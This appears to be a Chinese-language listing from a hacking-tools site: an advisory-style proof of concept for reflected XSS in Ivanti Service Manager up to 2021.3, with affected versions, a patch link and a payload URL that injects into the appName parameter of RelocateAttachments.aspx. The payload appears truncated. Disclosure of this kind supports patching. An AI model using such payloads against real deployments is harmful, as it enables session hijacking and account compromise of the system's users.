黑客、渗透测试和网络安全工具,武装您的安全武器库!
Ivanti Service Manager 2021.1 中通过 RelocateAttachments.aspx 中的 appName 参数实现反射型 XSS 的概念验证,影响版本直至 2021.3。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
Ivanti Service Manager 2021.1 存在反射型 XSS 漏洞,该漏洞通过与 ConfigDB 调用关联的 appName 参数触发,例如在 RelocateAttachments.aspx 中。 漏洞类型: 跨站脚本(XSS) 产品供应商: IVANTI 受影响产品版本: Service Manager - (=<2021.3) 载荷: http://localhost/HEAT/maintenance/RelocateAttachments.aspx?appId=2-IVNTI-APP02.localhost&appName=%27">ConfigDB 已修补版本: https://forums.ivanti.com/s/article/Ivanti-Neurons-for-ITSM-ITAM-v2021-4-Download?ui-force-components-controllers-recordGlobalValueProvider.RecordGvp.getRecord=1
Ivanti Service Manager 2021.1 存在反射型 XSS 漏洞,该漏洞通过与 ConfigDB 调用关联的 appName 参数触发,例如在 RelocateAttachments.aspx 中。
漏洞类型: 跨站脚本(XSS)
产品供应商: IVANTI
受影响产品版本: Service Manager - (=<2021.3)
载荷:
http://localhost/HEAT/maintenance/RelocateAttachments.aspx?appId=2-IVNTI-APP02.localhost&appName=%27">ConfigDB
已修补版本: https://forums.ivanti.com/s/article/Ivanti-Neurons-for-ITSM-ITAM-v2021-4-Download?ui-force-components-controllers-recordGlobalValueProvider.RecordGvp.getRecord=1